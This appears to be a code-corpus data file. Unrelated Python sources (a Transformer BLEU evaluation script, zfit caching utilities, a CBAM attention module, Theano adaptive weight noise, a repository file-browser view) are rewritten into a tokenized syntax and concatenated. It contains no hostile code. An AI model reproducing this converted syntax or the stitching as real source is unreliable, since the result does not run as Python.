self<block_start>self.translations=[]<line_sep>self.labels=[]<block_end><def_stmt>update self pred label<block_start><if_stmt>len(label)<ne>len(pred)<block_start><raise>ValueError("Reference and translation files have different number "<concat>"of lines. 
If training only a few steps (100-200), the "<concat>"translation may be empty.")<block_end>label=[x.lower()<for>x label]<line_sep>pred=[x.lower()<for>x pred]<line_sep>label=[bleu_tokenize(x)<for>x label]<line_sep>pred=[bleu_tokenize(x)<for>x pred]<line_sep>self.labels.extend(label)<line_sep>self.translations.extend(pred)<block_end><def_stmt>result self<block_start><return>metrics.compute_bleu(self.labels self.translations)<times>100<block_end><block_end><def_stmt>collate_fn batch<block_start>"""Puts each data field into a pd frame with outer dimension batch size"""<line_sep>elem=batch[0]<if_stmt>isinstance(elem tuple)<block_start>batch=zip(*batch)<line_sep><return>[collate_fn(samples)<for>samples batch]<block_end><elif_stmt>isinstance(elem np.ndarray)<block_start><return>[list(elem)<for>elem batch]<block_end><elif_stmt>isinstance(elem str)<block_start><return>batch<block_end><else_stmt><block_start><return>pd.DataFrame(batch).fillna(0).values.astype(np.int32)<block_end><block_end><def_stmt>load_graph file_name<block_start>tf.compat.v1.logging.info('Loading graph from: '+file_name)<with_stmt>tf.io.gfile.GFile(file_name "rb")<as>f<block_start>graph_def=tf.compat.v1.GraphDef()<line_sep>graph_def.ParseFromString(f.read())<block_end><with_stmt>tf.Graph().as_default()<as>graph<block_start>tf.import_graph_def(graph_def name='')<block_end><return>graph<block_end><def_stmt>eval_func infer_graph iteration=-1<block_start><if_stmt>isinstance(infer_graph tf.compat.v1.GraphDef)<block_start>graph=tf.Graph()<with_stmt>graph.as_default()<block_start>tf.import_graph_def(infer_graph name='')<block_end>infer_graph=graph<block_end>subtokenizer=Subtokenizer(FLAGS.vocab_file)<line_sep>input_tensor=infer_graph.get_tensor_by_name('input_tensor:0')<line_sep>output_tensor=infer_graph.get_tensor_by_name('model/Transformer/strided_slice_19:0')<line_sep>ds=Dataset(FLAGS.inputs_file FLAGS.reference_file FLAGS.vocab_file)<import_from_stmt>neural_compressor.data DATALOADERS<line_sep>dataloader=DATALOADERS['tensorflow'](ds batch_size=FLAGS.batch_size collate_fn=collate_fn)<line_sep>config=tf.compat.v1.ConfigProto()<line_sep>config.use_per_session_threads=1<line_sep>config.inter_op_parallelism_threads=1<line_sep>sess=tf.compat.v1.Session(graph=infer_graph config=config)<line_sep>time_list=[]<line_sep>bleu_eval=bleu()<line_sep>predictions=[]<line_sep>labels=[]<line_sep>warmup=10<if_stmt>iteration<ne>-1<block_start><assert_stmt>iteration<ge>warmup 'iteration must be larger than warmup'<block_end><for_stmt>idx,(input_data label) enumerate(dataloader)<block_start><if_stmt>idx<l>iteration<or>iteration<eq>-1<block_start>time_start=time.time()<line_sep>out=sess.run([output_tensor] {input_tensor:input_data})<line_sep>duration=time.time()-time_start<line_sep>time_list.append(duration)<line_sep>predictions.append(out)<line_sep>labels.extend(label)<block_end><else_stmt><block_start><break><block_end><block_end>latency=np.array(time_list[warmup:]).mean()/FLAGS.batch_size<line_sep>print('Batch size = {}'.format(FLAGS.batch_size))<line_sep>print('Latency: {:.3f} ms'.format(latency<times>1000))<line_sep>print('Throughput: {:.3f} items/sec'.format(1./latency))<line_sep># only calculate accuracy when running out all predictions
<if_stmt>iteration<eq>-1<block_start>decode=[]<for_stmt>i,tr enumerate(predictions)<block_start><for_stmt>j,itr enumerate(tr)<block_start><for_stmt>k,otr enumerate(itr)<block_start><try_stmt><block_start>index=list(otr).index(tokenizer.EOS_ID)<line_sep>decode.append(subtokenizer.decode(otr[:index]))<block_end><except_stmt><block_start>decode.append(subtokenizer.decode(otr))<block_end><block_end><block_end><block_end>bleu_eval.update(decode labels)<line_sep>print('Accuracy is {:.3f}'.format(bleu_eval.result()))<line_sep><return>bleu_eval.result()<block_end><block_end><class_stmt>Dataset(object)<block_start><def_stmt>__init__ self inputs_file reference_file vocab_file<block_start><with_stmt>tf.io.gfile.GFile(inputs_file)<as>f<block_start>records=f.read().split("\n")<line_sep>inputs=[record.strip()<for>record records]<if_stmt><not>inputs[-1]<block_start>inputs.pop()<block_end><block_end>self.ref_lines=tokenizer.native_to_unicode(tf.io.gfile.GFile(reference_file).read()).strip().splitlines()<line_sep>subtokenizer=Subtokenizer(vocab_file)<line_sep>self.batch=[]<line_sep>token_lens=[]<for_stmt>i,line enumerate(inputs)<block_start>enc=subtokenizer.encode(line add_eos=<true>)<line_sep>token_lens.append((i len(enc)))<block_end>sorted_by_token_input_lens=sorted(token_lens key=<lambda>x:x[1] reverse=<true>)<line_sep>sorted_inputs=[<none>]<times>len(sorted_by_token_input_lens)<line_sep>sorted_keys=[0]<times>len(sorted_by_token_input_lens)<line_sep>lines=[]<for_stmt>i,(index _) enumerate(sorted_by_token_input_lens)<block_start>sorted_inputs[i]=inputs[index]<line_sep>sorted_keys[index]=i<line_sep>enc=subtokenizer.encode(sorted_inputs[i] add_eos=<true>)<line_sep>lines.append([enc])<block_end><for_stmt>i sorted_keys<block_start>self.batch.append(lines[i])<block_end><block_end><def_stmt>__getitem__ self index<block_start>data=self.batch[index]<line_sep>label=self.ref_lines[index]<line_sep><return>data[0] label<block_end><def_stmt>__len__ self<block_start><return>len(self.batch)<block_end><block_end><def_stmt>main _<block_start>graph=load_graph(FLAGS.input_graph)<if_stmt>FLAGS.mode<eq>'tune'<block_start><import_from_stmt>neural_compressor.experimental Quantization common<line_sep>quantizer=Quantization(FLAGS.config)<line_sep>ds=Dataset(FLAGS.inputs_file FLAGS.reference_file FLAGS.vocab_file)<line_sep>quantizer.calib_dataloader=common.DataLoader(ds collate_fn=collate_fn batch_size=FLAGS.batch_size)<line_sep>quantizer.model=common.Model(graph)<line_sep>quantizer.eval_func=eval_func<line_sep>q_model=quantizer.fit()<try_stmt><block_start>q_model.save(FLAGS.output_model)<block_end><except_stmt>Exception<as>e<block_start>print("Failed to save model due to {}".format(str(e)))<block_end><block_end><elif_stmt>FLAGS.mode<eq>'benchmark'<block_start>eval_func(graph FLAGS.iters)<block_end><elif_stmt>FLAGS.mode<eq>'accuracy'<block_start>eval_func(graph -1)<block_end><block_end><if_stmt>__name__<eq>"__main__"<block_start>tf.compat.v1.app.run()<block_end> |
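For orientation, the bleu helper above can also be exercised on its own, outside the TensorFlow session; the strings below are made-up examples and the score relies on utils.metrics from the same repository.
scorer = bleu()
scorer.update(pred=["the cat sits on the mat"],
              label=["the cat sat on the mat"])
print("BLEU: {:.2f}".format(scorer.result()))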
"""Contains config file interfaces."""<line_sep> |
"""Module for caching.
The basic concept of caching in Zfit builds on a "cacher" that caches a certain value and that
depends on "cache_dependents". By implementing `ZfitCachable`, an object is able to play both
roles. Most importantly, it has a `_cache` dict that contains all the cached values.
Basic principle
===============
A "cacher" adds any dependents that it may comes across with `add_cache_dependents`. For example,
for a loss this would be all pdfs and data. Since :py:class:`~zfit.Space` is immutable, there is no need to add this
as a dependent. This leads to the "cache_dependent" to register the "cacher" and to remember it.
In case, any "cache_dependent" changes in a way the cache of itself (and any "cacher") is invalid,
which is done in the simplest case by decorating a method with `@invalidates_cache`, the "cache_dependent":
* clears its own cache with `reset_cache_self` and
* "clears" any "cacher"s cache with `reset_cache(reseter=self)`, telling the "cacher" that it should
reset the cache. This is also where more fine-grained control (depending on which "cache_dependent"
calls `reset_cache`) can be brought into play.
Example with a pdf that caches the normalization:
.. code:: python
class Parameter(Cachable):
def load(new_value): # does not require to build a new graph
# do something
@invalidates_cache
def change_limits(new_limits): # requires to build a new graph (as an example)
# do something
# create param1, param2 from `Parameter`
class MyPDF(Cachable):
def __init__(self, param1, param2):
self.add_cache_dependents([param1, param2])
def cached_func(...):
if self._cache.get('my_name') is None:
result = ... # calculations here
self._cache['my_name'] = result
else:
result = self._cache['my_name']
return result
"""<line_sep># Copyright (c) 2021 zfit
<import_stmt>functools<import_stmt>weakref<import_from_stmt>abc abstractmethod<import_from_stmt>typing Iterable Mapping Union<import_stmt>numpy<as>np<import_stmt>tensorflow<as>tf<import_from_stmt>. ztyping<import_from_stmt>.container convert_to_container<class_stmt>ZfitGraphCachable<block_start>@abstractmethod<def_stmt>register_cacher self cacher:"ZfitGraphCachable"<block_start><raise>NotImplementedError<block_end>@abstractmethod<def_stmt>add_cache_deps self cache_dependents allow_non_cachable<block_start>"""Add dependents that render the cache invalid if they change.
Args:
cache_dependents:
allow_non_cachable: If `True`, allow `cache_dependents` to be non-cachables.
If `False`, any `cache_dependents` that is not a `ZfitCachable` will raise an error.
Raises:
TypeError: if one of the `cache_dependents` is not a `ZfitCachable` _and_ `allow_non_cachable`
is `False`.
"""<line_sep><pass><block_end>@abstractmethod<def_stmt>reset_cache_self self<block_start>"""Clear the cache of self and all dependent cachers."""<line_sep><pass><block_end>@abstractmethod<def_stmt>reset_cache self reseter<block_start><pass><block_end><block_end><class_stmt>GraphCachable(ZfitGraphCachable)<block_start>graph_caching_methods=[]<line_sep>instances=weakref.WeakSet()<def_stmt>__init__ self *args **kwargs<block_start>self._cache={}<line_sep>self._cachers=weakref.WeakKeyDictionary()<line_sep>self.reset_cache_self()<line_sep>self.instances.add(self)<line_sep>super().__init__(*args **kwargs)<block_end><def_stmt>__init_subclass__ cls<arrow><none><block_start>super().__init_subclass__()<line_sep>graph_caching_methods=[]<for_stmt>func_name dir(cls)<block_start><if_stmt><not>func_name.startswith("__")<block_start>func=getattr(cls func_name)<if_stmt>callable(func)<and>hasattr(func 'zfit_graph_cache_registered')# assert hasattr(func, "_descriptor_cache"), "TensorFlow internals have changed. Need to update cache"
<block_start>func.zfit_graph_cache_registered=<true><line_sep>graph_caching_methods.append(func)<block_end><block_end><block_end>cls.graph_caching_methods=graph_caching_methods<block_end><def_stmt>register_cacher self cacher:ztyping.CacherOrCachersType<block_start>"""Register a `cacher` that caches values produced by this instance; a dependent.
Args:
cacher:
"""<if_stmt><not>isinstance(cacher ZfitGraphCachable)<block_start><raise>TypeError(f"`cacher` is not a `ZfitCachable` but {type(cacher)}")<block_end><if_stmt><not>cacher<in>self._cachers<block_start>self._cachers[cacher]=<none><block_end><block_end># could we have a more useful value?
<def_stmt>add_cache_deps self cache_deps:ztyping.CacherOrCachersType allow_non_cachable:bool=<true><block_start>"""Add dependencies that render the cache invalid if they change.
Args:
cache_deps:
allow_non_cachable: If `True`, allow `cache_dependents` to be non-cachables.
If `False`, any `cache_dependents` that is not a `ZfitCachable` will raise an error.
Raises:
TypeError: if one of the `cache_dependents` is not a `ZfitCachable` _and_ `allow_non_cachable`
is `False`.
"""<line_sep>cache_deps=convert_to_container(cache_deps)<for_stmt>cache_dep cache_deps<block_start><if_stmt>isinstance(cache_dep ZfitGraphCachable)<block_start>cache_dep.register_cacher(self)<block_end><elif_stmt><not>allow_non_cachable<block_start><raise>TypeError("cache_dependent {} is not a `ZfitCachable` but {}".format(cache_dep type(cache_dep)))<block_end><block_end><block_end><def_stmt>reset_cache_self self<block_start>"""Clear the cache of self and all dependent cachers."""<line_sep>self._clean_cache()<line_sep>self._inform_cachers()<block_end><def_stmt>reset_cache self reseter:'ZfitGraphCachable'<block_start>self.reset_cache_self()<block_end><def_stmt>_clean_cache self# for func_holder in self.graph_caching_methods:
# func_holder.reset
<block_start>self._cache={}<line_sep><return><block_end><def_stmt>_inform_cachers self<block_start><for_stmt>cacher self._cachers<block_start>cacher.reset_cache(reseter=self)<block_end><block_end><block_end><def_stmt>invalidate_graph func<block_start>@functools.wraps(func)<def_stmt>wrapped_func *args **kwargs<block_start>self=args[0]<if_stmt><not>isinstance(self ZfitGraphCachable)<block_start><raise>TypeError("Decorator can only be used in a subclass of `ZfitCachable`")<block_end>self.reset_cache(reseter=self)<line_sep><return>func(*args **kwargs)<block_end><return>wrapped_func<block_end><class_stmt>FunctionCacheHolder(GraphCachable)<block_start>IS_TENSOR=object()<def_stmt>__init__ self func wrapped_func cachables:Union[ZfitGraphCachable object Iterable[Union[ZfitGraphCachable object]]]=<none> cachables_mapping=<none><block_start>"""`tf.function` decorated function holder with caching dependencies on inputs.
A `tf.function` creates a new graph for every signature that is encountered. It automatically caches them but
thereby assumes that Python objects are immutable. Any mutation won't be detected. Therefore, an extra wrapper
is needed. The input signature is compared by first checking whether the function is the same and then
doing an equality comparison of the arguments (maybe too costly?).
The `FunctionCacheHolder` holds the
- original python function which serves as the hash of the object
- wrapped python function, `wrapped_func`
- the (keyword-)arguments
If any of the keyword arguments changes in a way that invalidates the graph cache, this holder will have
`is_valid` set to False and the `wrapped_func` cannot be used anymore; instead, a new `tf.function` should
be created, since a call to the `wrapped_func` with the given arguments would result in an outdated graph.
Args:
func: Python function that serves as a hash of the holder. Notice that equality is different
defined.
wrapped_func: Wrapped `func` with `tf.function`. The holder signals via
`is_valid` whether this function is still valid to be used.
cachables: objects that are cached. If they change, the cache is invalidated
cachables_mapping: keyword arguments to the function. If the values change, the cache is
invalidated.
"""<line_sep># cache = {} if cache is None else cache
self.delete_from_cache=<false><line_sep>self.wrapped_func=wrapped_func<line_sep># self.parent_cache = cache
self.python_func=func<line_sep>self._hash_value=hash(self.python_func)<if_stmt>cachables<is><none><and>cachables_mapping<is><none><block_start><raise>ValueError("Both `cachables and `cachables_mapping` are None. One needs to be different from None.")<block_end><if_stmt>cachables<is><none><block_start>cachables=[]<block_end><if_stmt>cachables_mapping<is><none><block_start>cachables_mapping={}<block_end>cachables=convert_to_container(cachables container=list)<line_sep>cachables_values=convert_to_container(cachables_mapping.values() container=list)<line_sep>cachables_all=cachables+cachables_values<line_sep>self.immutable_representation=self.create_immutable(cachables cachables_mapping)<line_sep># self._hash_value = hash(self.immutable_representation)
super().__init__()# resets the cache
self.add_cache_deps(cachables_all)<line_sep>self.is_valid=<true><block_end># needed to make the cache valid again
<def_stmt>reset_cache_self self<block_start>self.is_valid=<false><block_end><def_stmt>create_immutable self args kwargs<block_start>"""Create a tuple of the args and kwargs by combining them as `args + kwargs.keys() + kwargs.values()`.
Args:
args: list like
kwargs: dict-like
Returns:
"""<line_sep># is initialized before the core
<import_from_stmt>..core.interfaces ZfitData ZfitParameter ZfitSpace<line_sep>args=list(args)<line_sep>kwargs=list(kwargs.keys())+list(kwargs.values())<line_sep>combined=[]<if_stmt>args<ne>[]<block_start>combined<augadd>args<block_end><if_stmt>kwargs<ne>[]<block_start>combined<augadd>kwargs<block_end>combined_cleaned=[]<for_stmt>obj combined<block_start><if_stmt>isinstance(obj ZfitData)<block_start>obj=(id(obj) )<block_end><elif_stmt>isinstance(obj ZfitParameter)<block_start>obj=(ZfitParameter obj.name)<block_end><elif_stmt>isinstance(obj ZfitSpace)<block_start>obj=(id(obj) )<block_end><elif_stmt>tf.is_tensor(obj)<block_start>obj=self.IS_TENSOR<block_end><elif_stmt>isinstance(obj np.ndarray)<block_start>obj=(obj )<if>sum(obj.shape)<l>20<else>id(obj)<block_end>combined_cleaned.append(obj)<block_end><return>tuple(combined_cleaned)<block_end><def_stmt>__hash__ self<arrow>int<block_start><return>self._hash_value<block_end><def_stmt>__eq__ self other:object<arrow>bool<block_start><if_stmt><not>isinstance(other FunctionCacheHolder)<block_start><return><false><block_end># return all(obj1 == obj2 for obj1, obj2 in zip(self.immutable_representation, other.immutable_representation))
array_repr_self=np.array(self.immutable_representation dtype=object)<line_sep>array_repr_other=np.array(other.immutable_representation dtype=object)<try_stmt><block_start><return>all(np.equal(array_repr_self array_repr_other))<block_end><except_stmt>ValueError# broadcasting does not work
<block_start><return><false><block_end><except_stmt>TypeError# OperatorNotAllowedError inherits from this
<block_start><return><false><block_end># TODO: activate the below? costly, but runs?
# except OperatorNotAllowedInGraphError: # we have to assume they're not the same
# return False
<block_end><def_stmt>__repr__ self<arrow>str<block_start><return>f"<FunctionCacheHolder: {self.python_func}, valid={self.is_valid}>"<block_end><block_end><def_stmt>clear_graph_cache <block_start><import_from_stmt>zfit.z.zextension FunctionWrapperRegistry<for_stmt>registry FunctionWrapperRegistry.registries<block_start><for_stmt>all_meth registry.function_cache.values()<block_start><for_stmt>wrapped_meth all_meth<block_start>wrapped_meth=wrapped_meth.wrapped_func<line_sep>wrapped_meth._created_variables=<none><line_sep>wrapped_meth._stateful_fn=<none><line_sep>wrapped_meth._stateless_fn=<none><line_sep>wrapped_meth._descriptor_cache.clear()<block_end><block_end><block_end><for_stmt>registry FunctionWrapperRegistry.registries<block_start>registry.reset()<block_end><for_stmt>instance GraphCachable.instances<block_start>instance.reset_cache('global')<block_end># Cachable.graph_caching_methods.clear()
tf.compat.v1.reset_default_graph()<block_end> |
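The module docstring above still uses the older Cachable/invalidates_cache/add_cache_dependents spelling; a sketch of the same pattern with the names actually defined in this module (GraphCachable, invalidate_graph, add_cache_deps) could look as follows. expensive_integral is a placeholder for whatever costly computation is being cached.
def expensive_integral(param):
    return 42.0                          # stand-in for a real computation

class Param(GraphCachable):
    @invalidate_graph
    def set_limits(self, new_limits):    # invalidates its own cache and all registered cachers
        self.limits = new_limits

class Normalization(GraphCachable):
    def __init__(self, param):
        super().__init__()
        self.param = param
        self.add_cache_deps([param])     # changes to `param` reset our cache

    def value(self):
        if 'norm' not in self._cache:
            self._cache['norm'] = expensive_integral(self.param)
        return self._cache['norm']

# p = Param(); norm = Normalization(p)
# norm.value()           # computed once, then cached
# p.set_limits((0, 1))   # clears norm's cache via the registered cacher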
"""
This model is based on the implementation of https://github.com/Jongchan/attention-module.
"""<import_from_stmt>functools partial<import_stmt>torch<import_stmt>torch.nn<as>nn<import_from_stmt>einops reduce rearrange<import_stmt>models.layers<as>layers<class_stmt>ChannelGate(nn.Module)<block_start><def_stmt>__init__ self channel reduction=16 max_pool=<true><block_start>super().__init__()<line_sep>self.pools=[]<line_sep>self.pools.append(nn.AdaptiveAvgPool2d((1 1)))<line_sep>self.pools.append(nn.AdaptiveMaxPool2d((1 1)))<line_sep>self.pools=self.pools<if>max_pool<else>self.pools[:1]<line_sep>self.ff=nn.Sequential(layers.dense(channel channel<floordiv>reduction bias=<false>) layers.relu() layers.dense(channel<floordiv>reduction channel bias=<false>) )<line_sep>self.prob=nn.Sigmoid()<block_end><def_stmt>forward self x<block_start>b,c,h,w=x.shape<line_sep>s=torch.cat([pool(x)<for>pool self.pools] dim=-1)<line_sep>s=rearrange(s "b c n m -> b (n m) c")<line_sep>s=self.ff(s)<line_sep>s=reduce(s "b n c -> b c" "mean")<line_sep>s=self.prob(s)<line_sep>s=s.view(b c 1 1)<line_sep><return>x<times>s<block_end><block_end><class_stmt>SpatialGate(nn.Module)<block_start><def_stmt>__init__ self kernel_size=7 max_pool=<true><block_start>super().__init__()<line_sep>self.pools=[]<line_sep>self.pools.append(partial(torch.mean dim=1 keepdim=<true>))<line_sep>self.pools.append(<lambda>x:partial(torch.max dim=1 keepdim=<true>)(x)[0])<line_sep>self.pools=self.pools<if>max_pool<else>self.pools[:1]<line_sep>self.ff=nn.Sequential(layers.convnxn(len(self.pools) 1 kernel_size=7 stride=1 padding=(kernel_size-1)<floordiv>2) layers.bn(1))<line_sep>self.prob=nn.Sigmoid()<block_end><def_stmt>forward self x<block_start>s=torch.cat([pool(x)<for>pool self.pools] dim=1)<line_sep>s=self.ff(s)<line_sep>s=self.prob(s)<line_sep><return>x<times>s<block_end><block_end> |
'''
Functions similar to blocks.graph
'''<import_stmt>logging<import_stmt>numpy<import_stmt>theano<import_from_stmt>theano tensor<import_from_stmt>theano.sandbox.rng_mrg MRG_RandomStreams<import_from_stmt>blocks.config config<import_from_stmt>blocks.bricks.base Brick application<import_from_stmt>picklable_itertools.extras equizip<import_from_stmt>blocks.graph ComputationGraph<import_from_stmt>collections OrderedDict<line_sep>logger=logging.getLogger(__name__)<class_stmt>NoiseBrick(Brick)<block_start>"""
A brick to hold parameters introduced by adaptive noise.
For each model parameter, adaptive noise adds a corresponding standard deviation parameter.
These new parameters will be held by this brick.
Do not use this brick directly! Its main purpose is to hold noise
parameters and to wrap the new cost.
"""<def_stmt>__init__ self<block_start>super(NoiseBrick self).__init__(name='adaptive_noise')<line_sep>self.parameters=[]<line_sep>self.allocated=<true><line_sep>self.initialized=<true><block_end>@application(inputs=['train_cost' 'model_cost' 'model_prior_mean' 'model_prior_variance'] outputs=['total_cost'])<def_stmt>apply self application_call train_cost model_cost model_prior_mean model_prior_variance# We need to add those as auxiliary variables, as they are not
# used to compute the output, and therefore are lost
<block_start>application_call.add_auxiliary_variable(model_prior_mean.copy() name='model_prior_mean')<line_sep>application_call.add_auxiliary_variable(model_prior_variance.copy() name='model_prior_variance')<line_sep>total_cost=train_cost+model_cost<line_sep>total_cost.name='total_cost'<line_sep><return>total_cost<block_end><block_end><def_stmt>__get_name param<block_start>brick=<none><for_stmt>annotation param.tag.annotations<block_start><if_stmt>isinstance(annotation Brick)<block_start>brick=annotation<line_sep><break><block_end><block_end>brick_hierarchy=[brick]<while_stmt>brick_hierarchy[-1].parents<block_start>brick_hierarchy.append(brick_hierarchy[-1].parents[0])<block_end>name="{}.{}".format('/'.join((b.name<for>b brick_hierarchy[::-1])) param.name)<line_sep><return>name<block_end><def_stmt>apply_adaptive_noise computation_graph cost variables num_examples parameters=<none> init_sigma=1e-6 model_cost_coefficient=1.0 seed=<none> gradients=<none> <block_start>"""Add adaptive noise to parameters of a model.
Each of the given variables will be replaced by a normal
distribution with learned mean and standard deviation.
A model cost is computed based on the precision of the distributions
associated with each variable. It is added to the given cost used to
train the model.
See: <NAME> "Practical Variational Inference for Neural Networks",
NIPS 2011
Parameters
----------
computation_graph : instance of :class:`ComputationGraph`
The computation graph.
cost : :class:`~tensor.TensorVariable`
The cost without weight noise. It should be a member of the
computation_graph.
variables : :class:`~tensor.TensorVariable`
Variables to add noise to.
num_examples : int
Number of training examples. The cost of the model is divided by
the number of training examples; please see
<NAME> "Practical Variational Inference for Neural Networks"
for justification
parameters : list of :class:`~tensor.TensorVariable`
parameters of the model; if gradients are given, the list will not
be used. Otherwise, it will be used to compute the gradients
init_sigma : float,
initial standard deviation of noise variables
model_cost_coefficient : float,
the weight of the model cost
seed : int, optional
The seed with which
:class:`~theano.sandbox.rng_mrg.MRG_RandomStreams` is initialized,
is set to 1 by default.
gradients : dict, optional
Adaptive weight noise introduces new parameters for which new cost
and gradients must be computed. Unless the gradients parameter is
given, it will use theano.grad to get the gradients
Returns
-------
cost : :class:`~tensor.TensorVariable`
The new cost
computation_graph : instance of :class:`ComputationGraph`
new graph with added noise.
gradients : dict
a dictionary of gradients for all parameters: the original ones
and the adaptive noise ones
noise_brick : :class:`~lvsr.graph.NoiseBrick`
the brick that holds all noise parameters and whose .apply method
can be used to find variables added by adaptive noise
"""<if_stmt><not>seed<block_start>seed=config.default_seed<block_end>rng=MRG_RandomStreams(seed)<try_stmt><block_start>cost_index=computation_graph.outputs.index(cost)<block_end><except_stmt>ValueError<block_start><raise>ValueError("cost is not part of the computation_graph")<block_end><if_stmt>gradients<is><none><block_start><if_stmt>parameters<is><none><block_start><raise>ValueError("Either gradients or parameters must be given")<block_end>logger.info("Taking the cost gradient")<line_sep>gradients=dict(equizip(parameters tensor.grad(cost parameters)))<block_end><else_stmt><block_start><if_stmt>parameters<is><not><none><block_start>logger.warn("Both gradients and parameters given, will ignore"<concat>"parameters")<block_end>parameters=gradients.keys()<block_end>gradients=OrderedDict(gradients)<line_sep>log_sigma_scale=2048.0<line_sep>P_noisy=variables# We will add noise to these
Beta=[]# will hold means, log_stdev and stdevs
P_with_noise=[]# will hold params with added noise
# These don't change
P_clean=list(set(parameters).difference(P_noisy))<line_sep>noise_brick=NoiseBrick()<for_stmt>p P_noisy<block_start>p_u=p<line_sep>p_val=p.get_value(borrow=<true>)<line_sep>p_ls2=theano.shared((numpy.zeros_like(p_val)+numpy.log(init_sigma)<times>2./log_sigma_scale).astype(dtype=numpy.float32))<line_sep>p_ls2.name=__get_name(p_u)<line_sep>noise_brick.parameters.append(p_ls2)<line_sep>p_s2=tensor.exp(p_ls2<times>log_sigma_scale)<line_sep>Beta.append((p_u p_ls2 p_s2))<line_sep>p_noisy=p_u+rng.normal(size=p_val.shape)<times>tensor.sqrt(p_s2)<line_sep>p_noisy=tensor.patternbroadcast(p_noisy p.type.broadcastable)<line_sep>P_with_noise.append(p_noisy)<block_end># compute the prior mean and variation
temp_sum=0.0<line_sep>temp_param_count=0.0<for_stmt>p_u,unused_p_ls2,unused_p_s2 Beta<block_start>temp_sum=temp_sum+p_u.sum()<line_sep>temp_param_count=temp_param_count+p_u.shape.prod()<block_end>prior_u=tensor.cast(temp_sum/temp_param_count 'float32')<line_sep>temp_sum=0.0<for_stmt>p_u,unused_ls2,p_s2 Beta<block_start>temp_sum=temp_sum+(p_s2).sum()+(((p_u-prior_u)<power>2).sum())<block_end>prior_s2=tensor.cast(temp_sum/temp_param_count 'float32')<line_sep># convert everything to use the noisy parameters
full_computation_graph=ComputationGraph(computation_graph.outputs+gradients.values())<line_sep>full_computation_graph=full_computation_graph.replace(dict(zip(P_noisy P_with_noise)))<line_sep>LC=0.0# model cost
<for_stmt>p_u,p_ls2,p_s2 Beta<block_start>LC=(LC+0.5<times>((tensor.log(prior_s2)-p_ls2<times>log_sigma_scale).sum())+1.0/(2.0<times>prior_s2)<times>(((p_u-prior_u)<power>2)+p_s2-prior_s2).sum())<block_end>LC=LC/num_examples<times>model_cost_coefficient<line_sep>train_cost=noise_brick.apply(full_computation_graph.outputs[cost_index].copy() LC prior_u prior_s2)<line_sep>gradients=OrderedDict(zip(gradients.keys() full_computation_graph.outputs[-len(gradients):]))<line_sep>#
# Delete the gradients form the computational graph
#
<del_stmt>full_computation_graph.outputs[-len(gradients):]<line_sep>new_grads={p:gradients.pop(p)<for>p P_clean}<line_sep>#
# Warning!!!
# This only works for batch size 1 (we want the sum of squares to
# be the square of the sum!)
#
diag_hessian_estimate={p:g<power>2<for>p,g gradients.iteritems()}<for_stmt>p_u,p_ls2,p_s2 Beta<block_start>p_grad=gradients[p_u]<line_sep>p_u_grad=(model_cost_coefficient<times>(p_u-prior_u)/(num_examples<times>prior_s2)+p_grad)<line_sep>p_ls2_grad=(numpy.float32(model_cost_coefficient<times>0.5/num_examples<times>log_sigma_scale)<times>(p_s2/prior_s2-1.0)+(0.5<times>log_sigma_scale)<times>p_s2<times>diag_hessian_estimate[p_u])<line_sep>new_grads[p_u]=p_u_grad<line_sep>new_grads[p_ls2]=p_ls2_grad<block_end><return>train_cost full_computation_graph new_grads noise_brick<block_end> |
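A rough wiring sketch based only on the signature above, targeting the Python 2-era Blocks/Theano stack this module was written for; the toy quadratic cost and the constant num_examples=1000 are placeholders, not part of the original code.
import numpy
import theano
from theano import tensor
from blocks.graph import ComputationGraph

w = theano.shared(numpy.float32(0.5), name='w')           # single parameter to receive noise
x = tensor.scalar('x')
cost = (w * x - 1.0) ** 2
cost.name = 'cost'
cg = ComputationGraph(cost)

train_cost, noisy_cg, gradients, noise_brick = apply_adaptive_noise(
    computation_graph=cg,
    cost=cost,
    variables=[w],                                        # parameters that get adaptive noise
    num_examples=1000,
    parameters=[w],
    init_sigma=1e-6,
    model_cost_coefficient=1.0)
# `gradients` now also holds entries for the new log-sigma parameters owned by
# `noise_brick` and is meant to be handed to the training rule instead of
# recomputing theano.grad.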
# -*- coding: utf-8 -*-
<import_from_future_stmt> absolute_import<import_stmt>json<import_from_stmt>vilya.libs.template st<import_from_stmt>vilya.models.project CodeDoubanProject<line_sep>_q_exports=[]<class_stmt>BrowsefilesUI<block_start>_q_exports=['setting']<def_stmt>__init__ self proj_name<block_start>self.proj=proj_name<block_end><def_stmt>_q_access self request<block_start><if_stmt>'json'<in>request.environ['HTTP_ACCEPT']<block_start>self.output='json'<block_end><else_stmt><block_start>self.output='html'<block_end><block_end><def_stmt>_q_index self request<block_start>project=CodeDoubanProject.get_by_name(self.proj)<line_sep>user=request.user<line_sep>path=request.get_form_var('path' '')<line_sep>rev=request.get_form_var('rev' project.default_branch)<line_sep>allfiles=project.repo.get_tree(rev path=path)<line_sep>allfiles=[_add_file_type_and_warns(f)<for>f allfiles]<line_sep>errors=''<line_sep>project_name=self.proj<line_sep>project=CodeDoubanProject.get_by_name(project_name)<line_sep>ref=rev<if_stmt>ref<is><none><block_start>ref=project.default_branch<block_end>branches=project.repo.branches<line_sep>tags=project.repo.tags<line_sep>ref_type='branch'<if>ref<in>branches<else>'tag'<if>ref<in>tags<else>'tree'<if_stmt>self.output<eq>'json'<block_start><return>json.dumps(allfiles)<block_end><else_stmt><block_start><return>st('browsefiles.html' **locals())<block_end><block_end><block_end><def_stmt>_add_file_type_and_warns node<block_start>code_file_exts='py rb c h html mako ptl js css less handlebars coffee sql'.split()# noqa
bad_exts='pyc exe'.split()<line_sep>node_ext=node['path'].rsplit('.')[1]<if>'.'<in>node['path']<else>''<if_stmt>node['type']<eq>'tree'<block_start>icon_type='directory'<block_end><elif_stmt>node['type']<eq>'commit'<block_start>icon_type='submodule'<block_end><elif_stmt>node_ext<in>code_file_exts<block_start>icon_type='code-file'<block_end><else_stmt><block_start>icon_type='text-file'<block_end>node['icon-type']=icon_type<if_stmt>node_ext<in>bad_exts<block_start>node['warn']='bad'<block_end><else_stmt><block_start>node['warn']='no'<block_end><return>node<block_end> |
"""
Copyright (c) 2018-2022 Intel Corporation
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
